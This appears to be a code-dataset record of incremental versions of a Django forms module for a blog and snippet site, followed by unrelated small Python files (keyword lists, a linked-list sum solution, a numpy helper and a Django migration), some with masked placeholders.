'__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)\n self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics_icon'].widget = forms.HiddenInput()\n self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(\n )\n self.fields['snippet_topics_expire'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['snippet_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['snippet_topics_publish'].label = 'Publish'\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n\nclass TblQueriesForm(forms.ModelForm):\n\n\n class Meta:\n model = TblQueries\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblQueriesForm, self).__init__(*args, **kwargs)\n self.fields['datetime'].widget = forms.HiddenInput()\n self.fields['name'].widget.attrs['placeholder'] = 'Name'\n self.fields['email'].widget.attrs['placeholder'] = 'Email'\n self.fields['subject'].widget.attrs['placeholder'] = 'Subject'\n self.fields['message'].widget.attrs['placeholder'] = 'Message'\n",
"step-4": "<mask token>\n\n\nclass SignupForm(UserCreationForm):\n <mask token>\n\n\n class Meta:\n model = User\n fields = 'username', 'email', 'password1', 'password2'\n <mask token>\n\n\nclass UserRegistrationForm(forms.Form):\n username = forms.CharField(required=True, min_length=6, label=\n 'Username', max_length=100, widget=forms.TextInput(attrs={\n 'placeholder': 'Username'}))\n email = forms.EmailField(required=True, label='Email', max_length=100,\n widget=forms.EmailInput(attrs={'placeholder':\n 'e.g. : email@gmail.com'}))\n firstname = forms.CharField(required=True, label='First Name',\n max_length=100, widget=forms.TextInput(attrs={'placeholder':\n 'First Name'}))\n lastname = forms.CharField(required=True, label='Last Name', max_length\n =100, widget=forms.TextInput(attrs={'placeholder': 'Last Name'}))\n password = forms.CharField(required=True, label='Password', max_length=\n 100, widget=forms.PasswordInput(attrs={'placeholder': 'Password'}))\n passwordagain = forms.CharField(required=True, label='Password (Again)',\n max_length=100, widget=forms.PasswordInput(attrs={'placeholder':\n 'Password (Again)'}))\n\n\nclass TblPublishForm(forms.ModelForm):\n\n\n class Meta:\n model = TblPublish\n fields = '__all__'\n\n\nclass TblSnippetDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetData\n fields = ['snippet_topics', 'snippet_data_subject',\n 'snippet_data_description', 'snippet_data_keyword',\n 'snippet_data_code', 'snippet_data_datetime',\n 'snippet_data_added_by', 'snippet_topics', 'snippet_data_publish']\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetDataForm, self).__init__(*args, **kwargs)\n self.fields['snippet_data_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_data_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget = forms.HiddenInput()\n self.fields['snippet_data_subject'].widget.attrs['placeholder'\n ] = 'Title/Topics'\n self.fields['snippet_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['snippet_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['snippet_data_code'].widget.attrs['placeholder'\n ] = 'Snippet (Code)'\n self.fields['snippet_data_publish'].widget.attrs['placeholder'\n ] = 'Ready-To-Publish'\n self.fields['snippet_data_publish'].label = 'Publish'\n\n\nclass TblBlogForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlog\n fields = ['blog_title', 'blog_description', 'blog_keyword',\n 'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',\n 'blog_summary', 'blog_like', 'blog_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblBlogForm, self).__init__(*args, **kwargs)\n self.fields['blog_datetime'].widget = forms.HiddenInput()\n self.fields['blog_summary'].widget = forms.HiddenInput()\n self.fields['blog_like'].widget = forms.HiddenInput()\n self.fields['blog_added_by'].widget = forms.HiddenInput()\n self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['blog_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['blog_content'].widget.attrs['placeholder'\n ] = 'Blog Content'\n self.fields['blog_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'\n self.fields['blog_publish'].label = 'Publish'\n\n\nclass TblBlogCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogComments\n fields = '__all__'\n\n\nclass TblLearnDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnData\n fields = ['learn_data', 'learn_data_keyword',\n 'learn_data_description', 'learn_data_publish',\n 'learn_data_datetime', 'learn_data_added_by', 'learn_topics',\n 'learn_data_like', 'learn_data_icon']\n\n def __init__(self, *args, **kwargs):\n super(TblLearnDataForm, self).__init__(*args, **kwargs)\n self.fields['learn_data_datetime'].widget = forms.HiddenInput()\n self.fields['learn_data_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget = forms.HiddenInput()\n self.fields['learn_data_like'].widget = forms.HiddenInput()\n self.fields['learn_data_icon'].widget = forms.HiddenInput()\n self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['learn_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['learn_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['learn_data_publish'].label = 'Publish'\n\n\nclass TblLearnDataCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataComments\n fields = '__all__'\n\n\nclass TblBlogGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogGvp\n fields = '__all__'\n\n\nclass TblLearnDataGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataGvp\n fields = '__all__'\n\n\nclass TblHomeForm(forms.ModelForm):\n\n\n class Meta:\n model = TblHome\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblHomeForm, self).__init__(*args, **kwargs)\n self.fields['home_datetime'].widget = forms.HiddenInput()\n self.fields['home_added_by'].widget = forms.HiddenInput()\n self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['home_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['home_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['home_publish'].label = 'Publish'\n\n\nclass TblAboutForm(forms.ModelForm):\n\n\n class Meta:\n model = TblAbout\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblAboutForm, self).__init__(*args, **kwargs)\n self.fields['about_datetime'].widget = forms.HiddenInput()\n self.fields['about_added_by'].widget = forms.HiddenInput()\n self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['about_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['about_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['about_publish'].label = 'Publish'\n\n\nclass TblLearnTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblLearnTopicsForm, self).__init__(*args, **kwargs)\n self.fields['learn_topics_datetime'].widget = forms.HiddenInput()\n self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'\n self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['learn_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['learn_topics_publish'].label = 'Publish'\n\n def clean_learn_topics_added_by(self):\n if not self.cleaned_data['learn_topics_added_by']:\n return User()\n return self.cleaned_data['learn_topics_added_by']\n\n\nclass TblSnippetTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)\n self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics_icon'].widget = forms.HiddenInput()\n self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(\n )\n self.fields['snippet_topics_expire'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['snippet_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['snippet_topics_publish'].label = 'Publish'\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n\nclass TblQueriesForm(forms.ModelForm):\n\n\n class Meta:\n model = TblQueries\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblQueriesForm, self).__init__(*args, **kwargs)\n self.fields['datetime'].widget = forms.HiddenInput()\n self.fields['name'].widget.attrs['placeholder'] = 'Name'\n self.fields['email'].widget.attrs['placeholder'] = 'Email'\n self.fields['subject'].widget.attrs['placeholder'] = 'Subject'\n self.fields['message'].widget.attrs['placeholder'] = 'Message'\n",
"step-5": "from django import forms\nfrom django.contrib.auth.models import User\nfrom .models import TblPublish , TblSnippetTopics, TblSnippetData, TblLearnTopics, TblLearnData, TblBlog, TblBlogComments,TblLearnDataComments, TblBlogGvp, TblLearnDataGvp,TblSnippetDataGvp, TblHome, TblAbout, TblQueries\nfrom django.contrib.auth.forms import UserCreationForm\n\nclass UsersigninForm(forms.Form):\n username = forms.CharField(required = True, label = 'Username', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'Username'}))\n password = forms.CharField(required = True, label = 'Password', max_length = 32, widget = forms.PasswordInput(attrs={'placeholder': 'Password'}))\n\nclass SignupForm(UserCreationForm):\n email = forms.EmailField(max_length=200, help_text='Required')\n class Meta:\n model = User\n fields = ('username', 'email', 'password1', 'password2')\n\n def __init__(self, *args, **kwargs):\n super(SignupForm, self).__init__(*args, **kwargs)\n self.fields['username'].widget.attrs['placeholder'] = \"Username\"\n self.fields['email'].widget.attrs['placeholder'] = \"email\"\n self.fields['password1'].widget.attrs['placeholder'] =\"password\"\n self.fields['password2'].widget.attrs['placeholder'] = \"password Again\"\n\nclass UserRegistrationForm(forms.Form):\n username = forms.CharField(required = True, min_length=6,label = 'Username', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'Username'}) )\n email = forms.EmailField(required = True, label = 'Email', max_length = 100, widget=forms.EmailInput(attrs={'placeholder': 'e.g. : email@gmail.com'}))\n firstname = forms.CharField(required = True, label = 'First Name', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'First Name'}))\n lastname = forms.CharField(required = True, label = 'Last Name', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'Last Name'}))\n password = forms.CharField(required = True, label = 'Password', max_length = 100, widget = forms.PasswordInput(attrs={'placeholder': 'Password'}))\n passwordagain = forms.CharField(required = True, label = 'Password (Again)', max_length = 100, widget = forms.PasswordInput(attrs={'placeholder': 'Password (Again)'}))\n\nclass TblPublishForm(forms.ModelForm):\n class Meta():\n model = TblPublish\n fields = '__all__'\n\n\nclass TblSnippetDataForm(forms.ModelForm):\n class Meta():\n model = TblSnippetData\n fields = ['snippet_topics','snippet_data_subject','snippet_data_description','snippet_data_keyword','snippet_data_code','snippet_data_datetime','snippet_data_added_by','snippet_topics','snippet_data_publish']\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetDataForm, self).__init__(*args, **kwargs)\n self.fields['snippet_data_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_data_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget = forms.HiddenInput()\n self.fields['snippet_data_subject'].widget.attrs['placeholder'] = \"Title/Topics\"\n self.fields['snippet_data_description'].widget.attrs['placeholder'] = \"Brief Description\"\n self.fields['snippet_data_keyword'].widget.attrs['placeholder'] =\"Keyword For Search\"\n self.fields['snippet_data_code'].widget.attrs['placeholder'] = \"Snippet (Code)\"\n self.fields['snippet_data_publish'].widget.attrs['placeholder'] = \"Ready-To-Publish\"\n self.fields['snippet_data_publish'].label = \"Publish\"\n\nclass TblBlogForm(forms.ModelForm):\n class Meta():\n model = TblBlog\n fields = ['blog_title','blog_description','blog_keyword','blog_content','blog_pics','blog_publish','blog_datetime','blog_summary','blog_like','blog_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblBlogForm, self).__init__(*args, **kwargs)\n self.fields['blog_datetime'].widget = forms.HiddenInput()\n self.fields['blog_summary'].widget = forms.HiddenInput()\n self.fields['blog_like'].widget = forms.HiddenInput()\n self.fields['blog_added_by'].widget = forms.HiddenInput()\n self.fields['blog_title'].widget.attrs['placeholder'] = \"Title/Topics\"\n self.fields['blog_description'].widget.attrs['placeholder'] = \"Brief Description\"\n self.fields['blog_content'].widget.attrs['placeholder'] = \"Blog Content\"\n self.fields['blog_keyword'].widget.attrs['placeholder'] = \"Keyword For Search\"\n self.fields['blog_pics'].widget.attrs['placeholder'] = \"Upload Pics\"\n self.fields['blog_publish'].label = \"Publish\"\n\n\n\nclass TblBlogCommentsForm(forms.ModelForm):\n class Meta():\n model = TblBlogComments\n fields = '__all__'\n\nclass TblLearnDataForm(forms.ModelForm):\n class Meta():\n model = TblLearnData\n fields = ['learn_data','learn_data_keyword','learn_data_description','learn_data_publish','learn_data_datetime','learn_data_added_by','learn_topics','learn_data_like','learn_data_icon']\n\n def __init__(self, *args, **kwargs):\n super(TblLearnDataForm, self).__init__(*args, **kwargs)\n self.fields['learn_data_datetime'].widget = forms.HiddenInput()\n self.fields['learn_data_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget = forms.HiddenInput()\n self.fields['learn_data_like'].widget = forms.HiddenInput()\n self.fields['learn_data_icon'].widget = forms.HiddenInput()\n self.fields['learn_data'].widget.attrs['placeholder'] = \"Title/Topics\"\n self.fields['learn_data_description'].widget.attrs['placeholder'] = \"Brief Description\"\n self.fields['learn_data_keyword'].widget.attrs['placeholder'] = \"Keyword For Search\"\n self.fields['learn_data_publish'].label = \"Publish\"\n\nclass TblLearnDataCommentsForm(forms.ModelForm):\n class Meta():\n model = TblLearnDataComments\n fields = '__all__'\n\nclass TblBlogGvpForm(forms.ModelForm):\n class Meta():\n model = TblBlogGvp\n fields = '__all__'\nclass TblLearnDataGvpForm(forms.ModelForm):\n class Meta():\n model = TblLearnDataGvp\n fields = '__all__'\nclass TblHomeForm(forms.ModelForm):\n class Meta():\n model = TblHome\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblHomeForm, self).__init__(*args, **kwargs)\n self.fields['home_datetime'].widget = forms.HiddenInput()\n self.fields['home_added_by'].widget = forms.HiddenInput()\n self.fields['home_pics'].widget.attrs['placeholder'] = \"Upload Image\"\n self.fields['home_content'].widget.attrs['placeholder'] = \"Content\"\n self.fields['home_content_description'].widget.attrs['placeholder'] = \"Description\"\n self.fields['home_publish'].label = \"Publish\"\n\n\nclass TblAboutForm(forms.ModelForm):\n class Meta():\n model = TblAbout\n fields = '__all__'\n def __init__(self, *args, **kwargs):\n super(TblAboutForm, self).__init__(*args, **kwargs)\n self.fields['about_datetime'].widget = forms.HiddenInput()\n self.fields['about_added_by'].widget = forms.HiddenInput()\n self.fields['about_pics'].widget.attrs['placeholder'] = \"Upload Image\"\n self.fields['about_content'].widget.attrs['placeholder'] = \"Content\"\n self.fields['about_content_description'].widget.attrs['placeholder'] = \"Description\"\n self.fields['about_publish'].label = \"Publish\"\n\nclass TblLearnTopicsForm(forms.ModelForm):\n class Meta():\n model = TblLearnTopics\n fields = '__all__'\n def __init__(self, *args, **kwargs):\n super(TblLearnTopicsForm, self).__init__(*args, **kwargs)\n self.fields['learn_topics_datetime'].widget = forms.HiddenInput()\n # self.fields['learn_topics_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'\n self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget.attrs['placeholder'] = \"Topics\"\n self.fields['learn_topics_description'].widget.attrs['placeholder'] = \"Description\"\n self.fields['learn_topics_publish'].label = \"Publish\"\n\n\n\n def clean_learn_topics_added_by(self):\n if not self.cleaned_data['learn_topics_added_by']:\n return User()\n return self.cleaned_data['learn_topics_added_by']\n\nclass TblSnippetTopicsForm(forms.ModelForm):\n class Meta():\n model = TblSnippetTopics\n fields = '__all__'\n def __init__(self, *args, **kwargs):\n super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)\n self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics_icon'].widget = forms.HiddenInput()\n self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['snippet_topics_expire'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget.attrs['placeholder'] = \"Topics\"\n self.fields['snippet_topics_description'].widget.attrs['placeholder'] = \"Description\"\n self.fields['snippet_topics_publish'].label = \"Publish\"\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\nclass TblQueriesForm(forms.ModelForm):\n class Meta():\n model = TblQueries\n fields = '__all__'\n def __init__(self, *args, **kwargs):\n super(TblQueriesForm, self).__init__(*args, **kwargs)\n self.fields['datetime'].widget = forms.HiddenInput()\n self.fields['name'].widget.attrs['placeholder'] = \"Name\"\n self.fields['email'].widget.attrs['placeholder'] = \"Email\"\n self.fields['subject'].widget.attrs['placeholder'] = \"Subject\"\n self.fields['message'].widget.attrs['placeholder'] = \"Message\"\n",
"step-ids": [
19,
20,
22,
26,
32
]
}
|
[
19,
20,
22,
26,
32
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
Ylist = ['yes', 'Yes', 'Y', 'y']
Nlist = ['no', 'No', 'N', 'n']
America = ['America', 'america', 'amer', 'rica']
TRW = ['1775', 'The Revolutionary war', 'the Revolutionary war',
'the revolutionary war', 'The Revolutionary War', 'trw', 'Trw', 'TRW']
TCW = ['1861', 'The civil war', 'The civil War', 'The Civil war',
'The Civil war', 'The civil War', 'The Civil War', 'TCW', 'tcw', 'Tcw']
TGW = ['1917', 'The Great War', 'the great war', 'the great War',
'the Great war', 'The great war', 'WW1', 'ww1', 'Ww1', 'wW1',
'World War One', 'World war 1']
WW2 = ['1941', 'WW2', 'ww2', 'Ww2', 'W2', 'World war two', 'World war two',
'World War 2', 'World War Two', 'world war two', 'world war two']
Russia = ['Russia', 'russia', 'rusia', 'ra', 'Ra', 'Rusia', 'Ru']
RJW = ['1904', 'TRJW', 'trjw']
<|reserved_special_token_1|>
Ylist = ['yes', 'Yes', 'Y', 'y']
Nlist = ['no', 'No', 'N', 'n']
America = ['America', 'america', 'amer', 'rica']
TRW = ['1775', 'The Revolutionary war', 'the Revolutionary war', 'the revolutionary war', 'The Revolutionary War',
'trw', 'Trw', 'TRW']
TCW = ['1861', 'The civil war', 'The civil War', 'The Civil war', 'The Civil war', 'The civil War', 'The Civil War',
'TCW', 'tcw', 'Tcw']
TGW = ['1917', 'The Great War', 'the great war', 'the great War', 'the Great war', 'The great war', 'WW1', 'ww1', 'Ww1',
'wW1', 'World War One', 'World war 1']
WW2 = ['1941', 'WW2', 'ww2', 'Ww2', 'W2', 'World war two', 'World war two', 'World War 2', 'World War Two',
'world war two', 'world war two']
# Russia
Russia = ['Russia', 'russia', 'rusia', 'ra', 'Ra', 'Rusia', 'Ru']
RJW = ['1904', 'TRJW', 'trjw']
|
flexible
|
{
"blob_id": "6e07dcc3f3b8c7fbf8ce8d481b9612e7496967bd",
"index": 8316,
"step-1": "<mask token>\n",
"step-2": "Ylist = ['yes', 'Yes', 'Y', 'y']\nNlist = ['no', 'No', 'N', 'n']\nAmerica = ['America', 'america', 'amer', 'rica']\nTRW = ['1775', 'The Revolutionary war', 'the Revolutionary war',\n 'the revolutionary war', 'The Revolutionary War', 'trw', 'Trw', 'TRW']\nTCW = ['1861', 'The civil war', 'The civil War', 'The Civil war',\n 'The Civil war', 'The civil War', 'The Civil War', 'TCW', 'tcw', 'Tcw']\nTGW = ['1917', 'The Great War', 'the great war', 'the great War',\n 'the Great war', 'The great war', 'WW1', 'ww1', 'Ww1', 'wW1',\n 'World War One', 'World war 1']\nWW2 = ['1941', 'WW2', 'ww2', 'Ww2', 'W2', 'World war two', 'World war two',\n 'World War 2', 'World War Two', 'world war two', 'world war two']\nRussia = ['Russia', 'russia', 'rusia', 'ra', 'Ra', 'Rusia', 'Ru']\nRJW = ['1904', 'TRJW', 'trjw']\n",
"step-3": "Ylist = ['yes', 'Yes', 'Y', 'y']\r\nNlist = ['no', 'No', 'N', 'n']\r\nAmerica = ['America', 'america', 'amer', 'rica']\r\nTRW = ['1775', 'The Revolutionary war', 'the Revolutionary war', 'the revolutionary war', 'The Revolutionary War',\r\n 'trw', 'Trw', 'TRW']\r\nTCW = ['1861', 'The civil war', 'The civil War', 'The Civil war', 'The Civil war', 'The civil War', 'The Civil War',\r\n 'TCW', 'tcw', 'Tcw']\r\nTGW = ['1917', 'The Great War', 'the great war', 'the great War', 'the Great war', 'The great war', 'WW1', 'ww1', 'Ww1',\r\n 'wW1', 'World War One', 'World war 1']\r\nWW2 = ['1941', 'WW2', 'ww2', 'Ww2', 'W2', 'World war two', 'World war two', 'World War 2', 'World War Two',\r\n 'world war two', 'world war two']\r\n# Russia\r\nRussia = ['Russia', 'russia', 'rusia', 'ra', 'Ra', 'Rusia', 'Ru']\r\nRJW = ['1904', 'TRJW', 'trjw']\r\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
class ListNode(object):
def __init__(self, val, next=None):
self.val = val
self.next = next
class Solution:
"""
@param l1: the first list
@param l2: the second list
@return: the sum list of l1 and l2
"""
def addLists(self, l1, l2):
res = ListNode(0)
p = res
carry = 0
while l1 or l2 or carry:
num = 0
if l1:
num += l1.val
l1 = l1.next
if l2:
num += l2.val
l2 = l2.next
num += carry
digit, carry = num % 10, num // 10
node = ListNode(digit)
p.next = node
p = p.next
return res.next
|
normal
|
{
"blob_id": "8909ee9c54a234222a41249e1f3005fd86e21cf0",
"index": 1782,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-2": "<mask token>\n\n\nclass Solution:\n \"\"\"\n @param l1: the first list\n @param l2: the second list\n @return: the sum list of l1 and l2\n \"\"\"\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-3": "class ListNode(object):\n <mask token>\n\n\nclass Solution:\n \"\"\"\n @param l1: the first list\n @param l2: the second list\n @return: the sum list of l1 and l2\n \"\"\"\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-4": "class ListNode(object):\n\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n \"\"\"\n @param l1: the first list\n @param l2: the second list\n @return: the sum list of l1 and l2\n \"\"\"\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def differences(a, b):
""""""
c = a[a != b]
d = b[a != b]
nums = nonzero(a != b)[0]
return concatenate((mat(nums), c, d)).T
<|reserved_special_token_1|>
from numpy import *
def differences(a, b):
""""""
c = a[a != b]
d = b[a != b]
nums = nonzero(a != b)[0]
return concatenate((mat(nums), c, d)).T
<|reserved_special_token_1|>
#encoding:UTF-8
from numpy import *
#----------------------------------------------------------------------
def differences(a, b):
""""""
c = a[a!=b]
d = b[a!=b]
nums = nonzero(a!=b)[0]
return concatenate((mat(nums), c, d)).T
|
flexible
|
{
"blob_id": "67a76f1f1dad4b7e73359f04ca8f599c8d32dc92",
"index": 2900,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef differences(a, b):\n \"\"\"\"\"\"\n c = a[a != b]\n d = b[a != b]\n nums = nonzero(a != b)[0]\n return concatenate((mat(nums), c, d)).T\n",
"step-3": "from numpy import *\n\n\ndef differences(a, b):\n \"\"\"\"\"\"\n c = a[a != b]\n d = b[a != b]\n nums = nonzero(a != b)[0]\n return concatenate((mat(nums), c, d)).T\n",
"step-4": "#encoding:UTF-8\n\nfrom numpy import *\n\n#----------------------------------------------------------------------\ndef differences(a, b):\n \"\"\"\"\"\"\n c = a[a!=b]\n d = b[a!=b]\n nums = nonzero(a!=b)[0]\n return concatenate((mat(nums), c, d)).T",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('sepomex', '0006_auto_20151113_2154')]
operations = [migrations.CreateModel(name='MXCiudad', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('nombre', models.CharField(max_length=
200)), ('mx_estado', models.ForeignKey(on_delete=django.db.models.
deletion.CASCADE, related_name='ciudades', to='sepomex.MXEstado'))]
), migrations.AddField(model_name='mxasentamiento', name=
'mx_ciudad', field=models.ForeignKey(default='', on_delete=django.
db.models.deletion.CASCADE, related_name='ciudad', to=
'sepomex.MXCiudad'), preserve_default=False)]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [('sepomex', '0006_auto_20151113_2154')]
operations = [migrations.CreateModel(name='MXCiudad', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('nombre', models.CharField(max_length=
200)), ('mx_estado', models.ForeignKey(on_delete=django.db.models.
deletion.CASCADE, related_name='ciudades', to='sepomex.MXEstado'))]
), migrations.AddField(model_name='mxasentamiento', name=
'mx_ciudad', field=models.ForeignKey(default='', on_delete=django.
db.models.deletion.CASCADE, related_name='ciudad', to=
'sepomex.MXCiudad'), preserve_default=False)]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-23 17:10
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('sepomex', '0006_auto_20151113_2154'),
]
operations = [
migrations.CreateModel(
name='MXCiudad',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=200)),
('mx_estado', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ciudades', to='sepomex.MXEstado')),
],
),
migrations.AddField(
model_name='mxasentamiento',
name='mx_ciudad',
field=models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, related_name='ciudad', to='sepomex.MXCiudad'),
preserve_default=False,
),
]
|
flexible
|
{
"blob_id": "99c27d13349eba391866cfed25cc052b40910ea5",
"index": 2837,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('sepomex', '0006_auto_20151113_2154')]\n operations = [migrations.CreateModel(name='MXCiudad', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('nombre', models.CharField(max_length=\n 200)), ('mx_estado', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, related_name='ciudades', to='sepomex.MXEstado'))]\n ), migrations.AddField(model_name='mxasentamiento', name=\n 'mx_ciudad', field=models.ForeignKey(default='', on_delete=django.\n db.models.deletion.CASCADE, related_name='ciudad', to=\n 'sepomex.MXCiudad'), preserve_default=False)]\n",
